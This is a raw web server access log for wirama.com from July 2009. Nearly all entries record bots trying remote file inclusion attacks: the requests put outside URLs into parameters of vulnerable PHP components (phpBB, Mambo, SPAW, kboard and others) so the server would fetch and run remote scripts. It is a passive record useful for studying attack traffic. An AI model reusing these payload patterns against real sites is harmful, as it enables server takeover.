89.207.144.20 - - [01/Jul/2009:21:32:31 -0700] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://www.bosan.com.tw/cache/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
89.207.144.20 - - [01/Jul/2009:21:32:31 -0700] "GET /logs/access_090601.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://www.bosan.com.tw/cache/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:32:33 -0700] "GET /logs/access_090330.log/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:32:33 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:32:33 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:32:34 -0700] "GET /logs/access_090330.log/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:32:34 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:32:34 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.191.75.203 - - [01/Jul/2009:21:32:40 -0700] "GET /logs/access_090331.log/components/com_simpleboard/image_upload.php?sbp=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
207.58.155.223 - - [01/Jul/2009:21:38:12 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.155.223 - - [01/Jul/2009:21:38:12 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.155.223 - - [01/Jul/2009:21:38:12 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.172.179.213 - - [01/Jul/2009:21:41:03 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.172.179.213 - - [01/Jul/2009:21:41:03 -0700] "GET /logs/access_090601.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.172.179.213 - - [01/Jul/2009:21:41:03 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
91.198.32.3 - - [01/Jul/2009:21:45:55 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
91.198.32.3 - - [01/Jul/2009:21:45:55 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
91.198.32.3 - - [01/Jul/2009:21:45:55 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
91.198.32.3 - - [01/Jul/2009:21:49:16 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
91.198.32.3 - - [01/Jul/2009:21:49:16 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
119.93.90.155 - - [01/Jul/2009:21:59:46 -0700] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [01/Jul/2009:21:59:46 -0700] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
119.93.90.155 - - [01/Jul/2009:21:59:46 -0700] "GET /logs/access_090601.log%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://www.defendersofthebalance.com/includes/db/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:22:00:16 -0700] "GET /includes/class_item.php?fileExtension=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:22:00:16 -0700] "GET /logs/access_090531.log//includes/class_item.php?fileExtension=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:22:00:16 -0700] "GET /logs//includes/class_item.php?fileExtension=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:22:00:19 -0700] "GET /includes/class_item.php?fileExtension=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:22:00:19 -0700] "GET /logs//includes/class_item.php?fileExtension=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:22:00:19 -0700] "GET /logs/access_090531.log//includes/class_item.php?fileExtension=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:22:01:58 -0700] "GET /logs/access_090531.log%20%20//includes/class_item.php?fileExtension=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.96.240.245 - - [01/Jul/2009:22:02:02 -0700] "GET /logs/access_090531.log%20%20//includes/class_item.php?fileExtension=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.143.98.5 - - [01/Jul/2009:22:06:04 -0700] "GET /logs//includes/class_item.php?fileExtension=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.143.98.5 - - [01/Jul/2009:22:06:04 -0700] "GET /includes/class_item.php?fileExtension=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.143.98.5 - - [01/Jul/2009:22:06:04 -0700] "GET /logs/access_090531.log//includes/class_item.php?fileExtension=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.143.98.5 - - [01/Jul/2009:22:06:05 -0700] "GET /logs/access_090531.log//includes/class_item.php?fileExtension=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.143.98.5 - - [01/Jul/2009:22:06:05 -0700] "GET /logs//includes/class_item.php?fileExtension=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.143.98.5 - - [01/Jul/2009:22:06:06 -0700] "GET /includes/class_item.php?fileExtension=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.143.98.5 - - [01/Jul/2009:22:07:37 -0700] "GET /logs/access_090531.log%20%20//includes/class_item.php?fileExtension=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.143.98.5 - - [01/Jul/2009:22:07:37 -0700] "GET /logs/access_090531.log%20%20//includes/class_item.php?fileExtension=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.106.204 - - [01/Jul/2009:22:08:25 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
91.198.32.3 - - [01/Jul/2009:22:09:04 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
91.198.32.3 - - [01/Jul/2009:22:09:04 -0700] "GET /logs/access_090601.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
91.198.32.3 - - [01/Jul/2009:22:09:04 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
91.198.32.3 - - [01/Jul/2009:22:09:28 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
209.172.33.230 - - [01/Jul/2009:22:21:05 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.wirama.com"
209.172.33.230 - - [01/Jul/2009:22:21:05 -0700] "GET /logs/access_090331.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.wirama.com"
209.172.33.230 - - [01/Jul/2009:22:21:05 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.wirama.com"
209.172.33.230 - - [01/Jul/2009:22:21:15 -0700] "GET /logs/access_090330.log//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:22:22:38 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:22:40 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:22:40 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:23:41 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:23:41 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:23:41 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.232.54.48 - - [01/Jul/2009:22:24:08 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
209.172.33.230 - - [01/Jul/2009:22:24:30 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
209.172.33.230 - - [01/Jul/2009:22:24:30 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.raindrip.com/cms/media/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
201.232.54.48 - - [01/Jul/2009:22:24:51 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:22:24:51 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:22:24:51 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:22:24:57 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
201.232.54.48 - - [01/Jul/2009:22:24:58 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
91.198.32.3 - - [01/Jul/2009:22:26:41 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
91.198.32.3 - - [01/Jul/2009:22:26:41 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.55.106.204 - - [01/Jul/2009:22:26:41 -0700] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:27:50 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:27:50 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:27:51 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
91.198.32.3 - - [01/Jul/2009:22:28:02 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
91.198.32.3 - - [01/Jul/2009:22:28:02 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
91.198.32.3 - - [01/Jul/2009:22:29:03 -0700] "GET /logs/access_090330.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:22:31:12 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "wirama.com"
209.62.89.210 - - [01/Jul/2009:22:33:19 -0700] "GET /logs/access_090531.log//includes/class_item.php?fileExtension=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
209.62.89.210 - - [01/Jul/2009:22:33:19 -0700] "GET /includes/class_item.php?fileExtension=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
209.62.89.210 - - [01/Jul/2009:22:33:19 -0700] "GET /logs//includes/class_item.php?fileExtension=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
209.62.89.210 - - [01/Jul/2009:22:33:48 -0700] "GET /logs/access_090531.log//includes/class_item.php?fileExtension=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
209.62.89.210 - - [01/Jul/2009:22:33:48 -0700] "GET /includes/class_item.php?fileExtension=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
209.62.89.210 - - [01/Jul/2009:22:33:48 -0700] "GET /logs//includes/class_item.php?fileExtension=http://freebetfan.com/tmp/ab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
83.98.209.71 - - [01/Jul/2009:22:36:08 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:36:08 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:36:08 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.98.209.71 - - [01/Jul/2009:22:36:11 -0700] "GET /logs/access_090401.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.52 - - [01/Jul/2009:22:56:37 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.52 - - [01/Jul/2009:22:56:37 -0700] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:25 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:25 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:25 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:26 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:26 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:26 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:50 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:50 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:50 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:52 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:52 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:57:52 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:58:08 -0700] "GET /logs/access_090331.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:58:13 -0700] "GET /logs/access_090331.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:58:43 -0700] "GET /logs/access_090331.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
219.85.63.226 - - [01/Jul/2009:22:58:45 -0700] "GET /logs/access_090331.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.4-floor.com/mambo/modules/z1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:23:00:21 -0700] "GET /logs/access_090531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:23:00:37 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:23:00:37 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:23:00:37 -0700] "GET /logs/access_090531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
201.232.54.48 - - [01/Jul/2009:23:00:41 -0700] "GET /logs/access_090601.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
210.188.219.52 - - [01/Jul/2009:23:04:26 -0700] "GET /logs/access_090401.log//apboard/_test_holidays.php?APB_rp=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "wirama.com"
210.188.219.52 - - [01/Jul/2009:23:04:26 -0700] "GET /apboard/_test_holidays.php?APB_rp=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "wirama.com"
210.188.219.52 - - [01/Jul/2009:23:04:26 -0700] "GET /logs//apboard/_test_holidays.php?APB_rp=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "wirama.com"
210.188.219.52 - - [01/Jul/2009:23:11:58 -0700] "GET /logs/access_090301.log//apboard/_test_holidays.php?APB_rp=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:24:29 -0700] "GET //?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
66.96.240.245 - - [01/Jul/2009:23:24:30 -0700] "GET /logs///?_zb_path=http://e-sbplc-online.net/hosting/idxx.txt? HTTP/1.1" 200 2380 "-" "Mozilla/5.0" "wirama.com"
